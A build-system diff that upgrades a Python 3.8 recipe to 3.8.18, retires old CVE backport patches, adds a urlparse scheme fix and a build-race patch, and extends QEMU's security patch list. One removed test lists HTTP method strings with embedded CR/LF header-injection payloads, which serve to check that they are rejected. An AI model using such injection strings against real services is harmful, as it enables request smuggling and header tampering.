+From: Tim Orling <timothy.t.orling@intel.com>
+Date: Fri, 18 Jun 2021 11:56:50 -0700
+Subject: [PATCH] test_ctypes.test_find: skip without tools-sdk
+
+These tests need full packagegroup-core-buildessential, the
+easiest way to dynamically check for that is looking for
+'tools-sdk' in IMAGE_FEATURES.
+
+Upstream-Status: Inappropriate [oe-specific]
+
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
+---
+ Lib/ctypes/test/test_find.py | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/Lib/ctypes/test/test_find.py b/Lib/ctypes/test/test_find.py
+index 92ac184..0d009d1 100644
+--- a/Lib/ctypes/test/test_find.py
++++ b/Lib/ctypes/test/test_find.py
+@@ -112,10 +112,12 @@ class FindLibraryLinux(unittest.TestCase):
+                 # LD_LIBRARY_PATH)
+                 self.assertEqual(find_library(libname), 'lib%s.so' % libname)
+
++    @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
+     def test_find_library_with_gcc(self):
+         with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None):
+             self.assertNotEqual(find_library('c'), None)
+
++    @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
+     def test_find_library_with_ld(self):
+         with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None), \
+              unittest.mock.patch("ctypes.util._findLib_gcc", lambda *args: None):
diff --git a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
index 35b7e0c480..f9d2eadc11 100644
--- a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
+++ b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
@@ -1,6 +1,6 @@
-From b94995e0c694ec9561efec0d1a59b323340e6105 Mon Sep 17 00:00:00 2001
-From: Mingli Yu <mingli.yu@windriver.com>
-Date: Mon, 5 Aug 2019 15:57:39 +0800
+From e11787d373baa6d7b0e0d94aff8ccd373203bfb1 Mon Sep 17 00:00:00 2001
+From: Tim Orling <ticotimo@gmail.com>
+Date: Wed, 16 Jun 2021 07:49:52 -0700
 Subject: [PATCH] test_locale.py: correct the test output format
 
 Before this patch:
@@ -24,23 +24,25 @@ Before this patch:
 Upstream-Status: Submitted [https://github.com/python/cpython/pull/15132]
 
 Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+
+
+Refresh patch for upstream changes in 3.8.9
+
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
 ---
  Lib/test/test_locale.py | 2 +-
  1 file changed, 1 insertion(+), 1 deletion(-)
 
 diff --git a/Lib/test/test_locale.py b/Lib/test/test_locale.py
-index e2c2178..558d63c 100644
+index 39091c0..5050f3d 100644
 --- a/Lib/test/test_locale.py
 +++ b/Lib/test/test_locale.py
-@@ -527,7 +527,7 @@ class TestMiscellaneous(unittest.TestCase):
+@@ -563,7 +563,7 @@ class TestMiscellaneous(unittest.TestCase):
              self.skipTest('test needs Turkish locale')
          loc = locale.getlocale(locale.LC_CTYPE)
          if verbose:
 -            print('testing with %a' % (loc,), end=' ', flush=True)
 +            print('testing with %a...' % (loc,), end=' ', flush=True)
-         locale.setlocale(locale.LC_CTYPE, loc)
-         self.assertEqual(loc, locale.getlocale(locale.LC_CTYPE))
- 
--- 
-2.7.4
-
+         try:
+             locale.setlocale(locale.LC_CTYPE, loc)
+         except locale.Error as exc:
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch b/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
deleted file mode 100644
index 6889e46da9..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
+++ /dev/null
@@ -1,77 +0,0 @@
-From dc8ce8ead182de46584cc1ed8a8c51d48240cbd5 Mon Sep 17 00:00:00 2001
-From: "Miss Islington (bot)"
- <31488909+miss-islington@users.noreply.github.com>
-Date: Mon, 29 Jun 2020 11:12:50 -0700
-Subject: [PATCH] bpo-41004: Resolve hash collisions for IPv4Interface and
- IPv6Interface (GH-21033)
-
-The __hash__() methods of classes IPv4Interface and IPv6Interface had issue
-of generating constant hash values of 32 and 128 respectively causing hash collisions.
-The fix uses the hash() function to generate hash values for the objects
-instead of XOR operation
-(cherry picked from commit b30ee26e366bf509b7538d79bfec6c6d38d53f28)
-
-Co-authored-by: Ravi Teja P <rvteja92@gmail.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/dc8ce8ead182de46584cc1ed8a8c51d48240cbd5]
-CVE: CVE-2020-14422
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- Lib/ipaddress.py                                     |  4 ++--
- Lib/test/test_ipaddress.py                           | 12 ++++++++++++
- .../2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst         |  1 +
- 3 files changed, 15 insertions(+), 2 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-
-diff --git a/Lib/ipaddress.py b/Lib/ipaddress.py
-index 873c7644081af..a3a04f7f4b309 100644
---- a/Lib/ipaddress.py
-+++ b/Lib/ipaddress.py
-@@ -1370,7 +1370,7 @@ def __lt__(self, other):
-             return False
- 
-     def __hash__(self):
--        return self._ip ^ self._prefixlen ^ int(self.network.network_address)
-+        return hash((self._ip, self._prefixlen, int(self.network.network_address)))
- 
-     __reduce__ = _IPAddressBase.__reduce__
- 
-@@ -2017,7 +2017,7 @@ def __lt__(self, other):
-             return False
- 
-     def __hash__(self):
--        return self._ip ^ self._prefixlen ^ int(self.network.network_address)
-+        return hash((self._ip, self._prefixlen, int(self.network.network_address)))
- 
-     __reduce__ = _IPAddressBase.__reduce__
- 
-diff --git a/Lib/test/test_ipaddress.py b/Lib/test/test_ipaddress.py
-index de77111705b69..2eba740e5e7a4 100644
---- a/Lib/test/test_ipaddress.py
-+++ b/Lib/test/test_ipaddress.py
-@@ -2053,6 +2053,18 @@ def testsixtofour(self):
-                          sixtofouraddr.sixtofour)
-         self.assertFalse(bad_addr.sixtofour)
- 
-+    # issue41004 Hash collisions in IPv4Interface and IPv6Interface
-+    def testV4HashIsNotConstant(self):
-+        ipv4_address1 = ipaddress.IPv4Interface("1.2.3.4")
-+        ipv4_address2 = ipaddress.IPv4Interface("2.3.4.5")
-+        self.assertNotEqual(ipv4_address1.__hash__(), ipv4_address2.__hash__())
-+
-+    # issue41004 Hash collisions in IPv4Interface and IPv6Interface
-+    def testV6HashIsNotConstant(self):
-+        ipv6_address1 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:1")
-+        ipv6_address2 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:2")
-+        self.assertNotEqual(ipv6_address1.__hash__(), ipv6_address2.__hash__())
-+
- 
- if __name__ == '__main__':
-     unittest.main()
-diff --git a/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-new file mode 100644
-index 0000000000000..1380b31fbe9f4
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-@@ -0,0 +1 @@
-+The __hash__() methods of  ipaddress.IPv4Interface and ipaddress.IPv6Interface incorrectly generated constant hash values of 32 and 128 respectively. This resulted in always causing hash collisions. The fix uses hash() to generate hash values for the tuple of (address, mask length, network address).
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch b/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
deleted file mode 100644
index c019db2a76..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
+++ /dev/null
@@ -1,104 +0,0 @@
-From 668d321476d974c4f51476b33aaca870272523bf Mon Sep 17 00:00:00 2001
-From: "Miss Islington (bot)"
- <31488909+miss-islington@users.noreply.github.com>
-Date: Sat, 18 Jul 2020 13:39:12 -0700
-Subject: [PATCH] bpo-39603: Prevent header injection in http methods
- (GH-18485)
-
-reject control chars in http method in http.client.putrequest to prevent http header injection
-(cherry picked from commit 8ca8a2e8fb068863c1138f07e3098478ef8be12e)
-
-Co-authored-by: AMIR <31338382+amiremohamadi@users.noreply.github.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/668d321476d974c4f51476b33aaca870272523bf]
-CVE: CVE-2020-26116
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
-
----
- Lib/http/client.py                            | 15 +++++++++++++
- Lib/test/test_httplib.py                      | 22 +++++++++++++++++++
- .../2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst  |  2 ++
- 3 files changed, 39 insertions(+)
- create mode 100644 Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-
-diff --git a/Lib/http/client.py b/Lib/http/client.py
-index 019380a720318..c2ad0471bfee5 100644
---- a/Lib/http/client.py
-+++ b/Lib/http/client.py
-@@ -147,6 +147,10 @@
- #  _is_allowed_url_pchars_re = re.compile(r"^[/!$&'()*+,;=:@%a-zA-Z0-9._~-]+$")
- # We are more lenient for assumed real world compatibility purposes.
- 
-+# These characters are not allowed within HTTP method names
-+# to prevent http header injection.
-+_contains_disallowed_method_pchar_re = re.compile('[\x00-\x1f]')
-+
- # We always set the Content-Length header for these methods because some
- # servers will otherwise respond with a 411
- _METHODS_EXPECTING_BODY = {'PATCH', 'POST', 'PUT'}
-@@ -1087,6 +1091,8 @@ def putrequest(self, method, url, skip_host=False,
-         else:
-             raise CannotSendRequest(self.__state)
- 
-+        self._validate_method(method)
-+
-         # Save the method for use later in the response phase
-         self._method = method
- 
-@@ -1177,6 +1183,15 @@ def _encode_request(self, request):
-         # ASCII also helps prevent CVE-2019-9740.
-         return request.encode('ascii')
- 
-+    def _validate_method(self, method):
-+        """Validate a method name for putrequest."""
-+        # prevent http header injection
-+        match = _contains_disallowed_method_pchar_re.search(method)
-+        if match:
-+            raise ValueError(
-+                    f"method can't contain control characters. {method!r} "
-+                    f"(found at least {match.group()!r})")
-+
-     def _validate_path(self, url):
-         """Validate a url for putrequest."""
-         # Prevent CVE-2019-9740.
-diff --git a/Lib/test/test_httplib.py b/Lib/test/test_httplib.py
-index 8f0e27a1fb836..5a5fcecbc9c15 100644
---- a/Lib/test/test_httplib.py
-+++ b/Lib/test/test_httplib.py
-@@ -364,6 +364,28 @@ def test_headers_debuglevel(self):
-         self.assertEqual(lines[3], "header: Second: val2")
- 
- 
-+class HttpMethodTests(TestCase):
-+    def test_invalid_method_names(self):
-+        methods = (
-+            'GET\r',
-+            'POST\n',
-+            'PUT\n\r',
-+            'POST\nValue',
-+            'POST\nHOST:abc',
-+            'GET\nrHost:abc\n',
-+            'POST\rRemainder:\r',
-+            'GET\rHOST:\n',
-+            '\nPUT'
-+        )
-+
-+        for method in methods:
-+            with self.assertRaisesRegex(
-+                    ValueError, "method can't contain control characters"):
-+                conn = client.HTTPConnection('example.com')
-+                conn.sock = FakeSocket(None)
-+                conn.request(method=method, url="/")
-+
-+
- class TransferEncodingTest(TestCase):
-     expected_body = b"It's just a flesh wound"
- 
-diff --git a/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-new file mode 100644
-index 0000000000000..990affc3edd9d
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-@@ -0,0 +1,2 @@
-+Prevent http header injection by rejecting control characters in
-+http.client.putrequest(...).
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch b/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
deleted file mode 100644
index bafa1cb999..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 6c6c256df3636ff6f6136820afaefa5a10a3ac33 Mon Sep 17 00:00:00 2001
-From: "Miss Skeleton (bot)" <31488909+miss-islington@users.noreply.github.com>
-Date: Tue, 6 Oct 2020 05:38:54 -0700
-Subject: [PATCH] bpo-41944: No longer call eval() on content received via HTTP
- in the CJK codec tests (GH-22566) (GH-22577)
-
-(cherry picked from commit 2ef5caa58febc8968e670e39e3d37cf8eef3cab8)
-
-Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
-
-Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/6c6c256df3636ff6f6136820afaefa5a10a3ac33]
-CVE: CVE-2020-27619
-Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
----
- Lib/test/multibytecodec_support.py            | 22 +++++++------------
- .../2020-10-05-17-43-46.bpo-41944.rf1dYb.rst  |  1 +
- 2 files changed, 9 insertions(+), 14 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-
-diff --git a/Lib/test/multibytecodec_support.py b/Lib/test/multibytecodec_support.py
-index cca8af67d6d1d..f76c0153f5ecf 100644
---- a/Lib/test/multibytecodec_support.py
-+++ b/Lib/test/multibytecodec_support.py
-@@ -305,29 +305,23 @@ def test_mapping_file(self):
-             self._test_mapping_file_plain()
- 
-     def _test_mapping_file_plain(self):
--        unichrs = lambda s: ''.join(map(chr, map(eval, s.split('+'))))
-+        def unichrs(s):
-+            return ''.join(chr(int(x, 16)) for x in s.split('+'))
-+
-         urt_wa = {}
- 
-         with self.open_mapping_file() as f:
-             for line in f:
-                 if not line:
-                     break
--                data = line.split('#')[0].strip().split()
-+                data = line.split('#')[0].split()
-                 if len(data) != 2:
-                     continue
- 
--                csetval = eval(data[0])
--                if csetval <= 0x7F:
--                    csetch = bytes([csetval & 0xff])
--                elif csetval >= 0x1000000:
--                    csetch = bytes([(csetval >> 24), ((csetval >> 16) & 0xff),
--                                    ((csetval >> 8) & 0xff), (csetval & 0xff)])
--                elif csetval >= 0x10000:
--                    csetch = bytes([(csetval >> 16), ((csetval >> 8) & 0xff),
--                                    (csetval & 0xff)])
--                elif csetval >= 0x100:
--                    csetch = bytes([(csetval >> 8), (csetval & 0xff)])
--                else:
-+                if data[0][:2] != '0x':
-+                    self.fail(f"Invalid line: {line!r}")
-+                csetch = bytes.fromhex(data[0][2:])
-+                if len(csetch) == 1 and 0x80 <= csetch[0]:
-                     continue
- 
-                 unich = unichrs(data[1])
-diff --git a/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-new file mode 100644
-index 0000000000000..4f9782f1c85af
---- /dev/null
-+++ b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-@@ -0,0 +1 @@
-+Tests for CJK codecs no longer call ``eval()`` on content received via HTTP.
diff --git a/meta/recipes-devtools/python/python3/CVE-2023-24329.patch b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
new file mode 100644
index 0000000000..23dec65602
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
@@ -0,0 +1,80 @@
+From 72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9 Mon Sep 17 00:00:00 2001
+From: "Miss Islington (bot)"
+ <31488909+miss-islington@users.noreply.github.com>
+Date: Sun, 13 Nov 2022 11:00:25 -0800
+Subject: [PATCH] gh-99418: Make urllib.parse.urlparse enforce that a scheme
+ must begin with an alphabetical ASCII character. (GH-99421)
+
+Prevent urllib.parse.urlparse from accepting schemes that don't begin with an alphabetical ASCII character.
+
+RFC 3986 defines a scheme like this: `scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )`
+RFC 2234 defines an ALPHA like this: `ALPHA = %x41-5A / %x61-7A`
+
+The WHATWG URL spec defines a scheme like this:
+`"A URL-scheme string must be one ASCII alpha, followed by zero or more of ASCII alphanumeric, U+002B (+), U+002D (-), and U+002E (.)."`
+(cherry picked from commit 439b9cfaf43080e91c4ad69f312f21fa098befc7)
+
+Co-authored-by: Ben Kallus <49924171+kenballus@users.noreply.github.com>
+
+Upstream-Status: Backport [https://github.com/python/cpython/commit/72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9]
+CVE: CVE-2023-24329
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ Lib/test/test_urlparse.py                      | 18 ++++++++++++++++++
+ Lib/urllib/parse.py                            |  2 +-
+ ...22-11-12-15-45-51.gh-issue-99418.FxfAXS.rst |  2 ++
+ 3 files changed, 21 insertions(+), 1 deletion(-)
+ create mode 100644 Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+
+diff --git a/Lib/test/test_urlparse.py b/Lib/test/test_urlparse.py
+index 0ad3bf1..e1aa913 100644
+--- a/Lib/test/test_urlparse.py
++++ b/Lib/test/test_urlparse.py
+@@ -735,6 +735,24 @@ class UrlParseTestCase(unittest.TestCase):
+                         with self.assertRaises(ValueError):
+                             p.port
+
++    def test_attributes_bad_scheme(self):
++        """Check handling of invalid schemes."""
++        for bytes in (False, True):
++            for parse in (urllib.parse.urlsplit, urllib.parse.urlparse):
++                for scheme in (".", "+", "-", "0", "http&", "६http"):
++                    with self.subTest(bytes=bytes, parse=parse, scheme=scheme):
++                        url = scheme + "://www.example.net"
++                        if bytes:
++                            if url.isascii():
++                                url = url.encode("ascii")
++                            else:
++                                continue
++                        p = parse(url)
++                        if bytes:
++                            self.assertEqual(p.scheme, b"")
++                        else:
++                            self.assertEqual(p.scheme, "")
++
+     def test_attributes_without_netloc(self):
+         # This example is straight from RFC 3261.  It looks like it
+         # should allow the username, hostname, and port to be filled
+diff --git a/Lib/urllib/parse.py b/Lib/urllib/parse.py
+index 979e6d2..2e7a3e2 100644
+--- a/Lib/urllib/parse.py
++++ b/Lib/urllib/parse.py
+@@ -452,7 +452,7 @@ def urlsplit(url, scheme='', allow_fragments=True):
+         clear_cache()
+     netloc = query = fragment = ''
+     i = url.find(':')
+-    if i > 0:
++    if i > 0 and url[0].isascii() and url[0].isalpha():
+         if url[:i] == 'http': # optimize the common case
+             url = url[i+1:]
+             if url[:2] == '//':
+diff --git a/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+new file mode 100644
+index 0000000..0a06e7c
+--- /dev/null
++++ b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+@@ -0,0 +1,2 @@
++Fix bug in :func:`urllib.parse.urlparse` that causes URL schemes that begin
++with a digit, a plus sign, or a minus sign to be parsed incorrectly.
+--
+2.25.1
diff --git a/meta/recipes-devtools/python/python3/makerace.patch b/meta/recipes-devtools/python/python3/makerace.patch
new file mode 100644
index 0000000000..8971f28b8e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/makerace.patch
@@ -0,0 +1,23 @@
+libainstall installs python-config.py but the .pyc cache files are generated
+by the libinstall target. This means some builds may not generate the pyc files
+for python-config.py depending on the order things happen in. This means builds
+are not always reproducible.
+
+Add a dependency to avoid the race.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: Python-3.8.11/Makefile.pre.in
+===================================================================
+--- Python-3.8.11.orig/Makefile.pre.in
++++ Python-3.8.11/Makefile.pre.in
+@@ -1415,7 +1415,7 @@ LIBSUBDIRS=	tkinter tkinter/test tkinter
+ 		unittest unittest/test unittest/test/testmock \
+ 		venv venv/scripts venv/scripts/common venv/scripts/posix \
+ 		curses pydoc_data
+-libinstall:	build_all $(srcdir)/Modules/xxmodule.c
++libinstall:	build_all $(srcdir)/Modules/xxmodule.c libainstall
+ 	@for i in $(SCRIPTDIR) $(LIBDEST); \
+ 	do \
+ 		if test ! -d $(DESTDIR)$$i; then \
diff --git a/meta/recipes-devtools/python/python3/python3-manifest.json b/meta/recipes-devtools/python/python3/python3-manifest.json
index 3bcc9b8662..0e87f91dd8 100644
--- a/meta/recipes-devtools/python/python3/python3-manifest.json
+++ b/meta/recipes-devtools/python/python3/python3-manifest.json
@@ -531,7 +531,9 @@
         "rdepends": [
             "core"
         ],
-        "files": [],
+        "files": [
+            "${libdir}/python${PYTHON_MAJMIN}/distutils/command/wininst-*.exe"
+        ],
         "cached": []
     },
     "distutils": {
diff --git a/meta/recipes-devtools/python/python3_3.8.2.bb b/meta/recipes-devtools/python/python3_3.8.18.bb
index 1d0b4cdb77..9d0f72ecf9 100644
--- a/meta/recipes-devtools/python/python3_3.8.2.bb
+++ b/meta/recipes-devtools/python/python3_3.8.18.bb
@@ -1,9 +1,10 @@
 SUMMARY = "The Python Programming Language"
 HOMEPAGE = "http://www.python.org"
-LICENSE = "PSFv2"
+DESCRIPTION = "Python is a programming language that lets you work more quickly and integrate your systems more effectively."
+LICENSE = "PSF-2.0 & BSD-0-Clause"
 SECTION = "devel/python"
 
-LIC_FILES_CHKSUM = "file://LICENSE;md5=203a6dbc802ee896020a47161e759642"
+LIC_FILES_CHKSUM = "file://LICENSE;md5=07fc4b9a9c0c0e48050ed38a5e72552b"
 
 SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
            file://run-ptest \
@@ -32,10 +33,8 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
            file://0001-configure.ac-fix-LIBPL.patch \
            file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \
            file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \
-           file://0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch \
-           file://CVE-2020-14422.patch \
-           file://CVE-2020-26116.patch \
-           file://CVE-2020-27619.patch \
+           file://makerace.patch \
+           file://CVE-2023-24329.patch \
            "
 
 SRC_URI_append_class-native = " \
@@ -44,19 +43,26 @@ SRC_URI_append_class-native = " \
            file://0001-Don-t-search-system-for-headers-libraries.patch \
            "
 
-SRC_URI[md5sum] = "e9d6ebc92183a177b8e8a58cad5b8d67"
-SRC_URI[sha256sum] = "2646e7dc233362f59714c6193017bb2d6f7b38d6ab4a0cb5fbac5c36c4d845df"
+SRC_URI[md5sum] = "5ea6267ea00513fc31d3746feb35842d"
+SRC_URI[sha256sum] = "3ffb71cd349a326ba7b2fadc7e7df86ba577dd9c4917e52a8401adbda7405e3f"
 
 # exclude pre-releases for both python 2.x and 3.x
 UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P<pver>\d+(\.\d+)+).tar"
 
 CVE_PRODUCT = "python"
 
+# Upstream consider this expected behaviour
+CVE_CHECK_WHITELIST += "CVE-2007-4559"
 # This is not exploitable when glibc has CVE-2016-10739 fixed.
 CVE_CHECK_WHITELIST += "CVE-2019-18348"
 
 # This is windows only issue.
-CVE_CHECK_WHITELIST += "CVE-2020-15523"
+CVE_CHECK_WHITELIST += "CVE-2020-15523 CVE-2022-26488"
+# The mailcap module is insecure by design, so this can't be fixed in a meaningful way.
+# The module will be removed in the future and flaws documented.
+CVE_CHECK_WHITELIST += "CVE-2015-20107"
+# Not an issue, in fact expected behaviour
+CVE_CHECK_WHITELIST += "CVE-2023-36632"
 
 PYTHON_MAJMIN = "3.8"
 
@@ -73,7 +79,7 @@ ALTERNATIVE_LINK_NAME[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config
 ALTERNATIVE_TARGET[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config-${MULTILIB_SUFFIX}"
 
 
-DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2"
+DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2 autoconf-archive"
 DEPENDS_append_class-target = " python3-native"
 DEPENDS_append_class-nativesdk = " python3-native"
 
@@ -309,11 +315,8 @@ do_create_manifest() {
 }
 
 # bitbake python -c create_manifest
-addtask do_create_manifest
-
 # Make sure we have native python ready when we create a new manifest
-do_create_manifest[depends] += "${PN}:do_prepare_recipe_sysroot"
-do_create_manifest[depends] += "${PN}:do_patch"
+addtask do_create_manifest after do_patch do_prepare_recipe_sysroot
 
 # manual dependency additions
 RRECOMMENDS_${PN}-core_append_class-nativesdk = " nativesdk-python3-modules"
@@ -335,6 +338,7 @@ PACKAGES =+ "libpython3 libpython3-staticdev"
 FILES_libpython3 = "${libdir}/libpython*.so.*"
 FILES_libpython3-staticdev += "${libdir}/python${PYTHON_MAJMIN}/config-${PYTHON_MAJMIN}-*/libpython${PYTHON_MAJMIN}.a"
 INSANE_SKIP_${PN}-dev += "dev-elf"
+INSANE_SKIP_${PN}-ptest += "dev-deps"
 
 # catch all the rest (unsorted)
 PACKAGES += "${PN}-misc"
@@ -350,10 +354,16 @@ FILES_${PN}-man = "${datadir}/man"
 # See https://bugs.python.org/issue18748 and https://bugs.python.org/issue37395
 RDEPENDS_libpython3_append_libc-glibc = " libgcc"
 RDEPENDS_${PN}-ctypes_append_libc-glibc = " ${MLPREFIX}ldconfig"
-RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests unzip bzip2 libgcc tzdata-europe coreutils sed"
+RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests ${PN}-dev unzip bzip2 libgcc tzdata-europe coreutils sed"
 RDEPENDS_${PN}-ptest_append_libc-glibc = " locale-base-tr-tr.iso-8859-9"
 RDEPENDS_${PN}-tkinter += "${@bb.utils.contains('PACKAGECONFIG', 'tk', 'tk tk-lib', '', d)}"
 RDEPENDS_${PN}-dev = ""
 
 RDEPENDS_${PN}-tests_append_class-target = " bash"
 RDEPENDS_${PN}-tests_append_class-nativesdk = " bash"
+
+# Python's tests contain large numbers of files we don't need in the recipe sysroots
+SYSROOT_PREPROCESS_FUNCS += " py3_sysroot_cleanup"
+py3_sysroot_cleanup () {
+	rm -rf ${SYSROOT_DESTDIR}${libdir}/python${PYTHON_MAJMIN}/test
+}
diff --git a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
index d83ee59375..5ae6a37f26 100644
--- a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
@@ -9,7 +9,7 @@ DEPENDS = "glib-2.0-native zlib-native pixman-native qemu-native bison-native"
 
 EXTRA_OECONF_append = " --target-list=${@get_qemu_system_target_list(d)}"
 
-PACKAGECONFIG ??= "fdt alsa kvm"
+PACKAGECONFIG ??= "fdt alsa kvm slirp"
 
 # Handle distros such as CentOS 5 32-bit that do not have kvm support
 PACKAGECONFIG_remove = "${@'kvm' if not os.path.exists('/usr/include/linux/kvm.h') else ''}"
diff --git a/meta/recipes-devtools/qemu/qemu.inc b/meta/recipes-devtools/qemu/qemu.inc
index 067179fdeb..59ff69d51d 100644
--- a/meta/recipes-devtools/qemu/qemu.inc
+++ b/meta/recipes-devtools/qemu/qemu.inc
@@ -28,35 +28,154 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \
            file://0009-Fix-webkitgtk-builds.patch \
            file://0010-configure-Add-pkg-config-handling-for-libgcrypt.patch \
            file://0011-hw-i386-pc-fix-regression-in-parsing-vga-cmdline-par.patch \
+           file://0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch \
            file://CVE-2019-15890.patch \
            file://CVE-2020-1711.patch \
            file://CVE-2020-7039-1.patch \
            file://CVE-2020-7039-2.patch \
            file://CVE-2020-7039-3.patch \
            file://0001-Add-enable-disable-udev.patch \
-	   file://CVE-2020-7211.patch \
-	   file://0001-qemu-Do-not-include-file-if-not-exists.patch \
+           file://CVE-2020-7211.patch \
+           file://0001-qemu-Do-not-include-file-if-not-exists.patch \
            file://CVE-2020-11102.patch \
-	   file://CVE-2020-11869.patch \
-	   file://CVE-2020-13361.patch \
-	   file://CVE-2020-10761.patch \
-	   file://CVE-2020-10702.patch \
-	   file://CVE-2020-13659.patch \
-	   file://CVE-2020-13800.patch \
-	   file://CVE-2020-13362.patch \
-	   file://CVE-2020-15863.patch \
-	   file://CVE-2020-14364.patch \
-	   file://CVE-2020-14415.patch \
-	   file://CVE-2020-16092.patch \
-	   file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \
-	   file://CVE-2019-20175.patch \
-	   file://CVE-2020-24352.patch \
-	   "
+           file://CVE-2020-11869.patch \
+           file://CVE-2020-13361.patch \
+           file://CVE-2020-10761.patch \
+           file://CVE-2020-10702.patch \
+           file://CVE-2020-13659.patch \
+           file://CVE-2020-13800.patch \
+           file://CVE-2020-13362.patch \
+           file://CVE-2020-15863.patch \
+           file://CVE-2020-14364.patch \
+           file://CVE-2020-14415.patch \
+           file://CVE-2020-16092.patch \
+           file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \
+           file://CVE-2019-20175.patch \
+           file://CVE-2020-24352.patch \
+           file://CVE-2020-25723.patch \
+           file://CVE-2021-20203.patch \
+           file://CVE-2021-3392.patch \
+           file://CVE-2020-25085.patch \
+           file://CVE-2020-25624_1.patch \
+           file://CVE-2020-25624_2.patch \
+           file://CVE-2020-25625.patch \
+           file://CVE-2020-29443.patch \
+           file://CVE-2021-20221.patch \
+           file://CVE-2021-20181.patch \
+           file://CVE-2021-3416_1.patch \
+           file://CVE-2021-3416_2.patch \
+           file://CVE-2021-3416_3.patch \
+           file://CVE-2021-3416_5.patch \
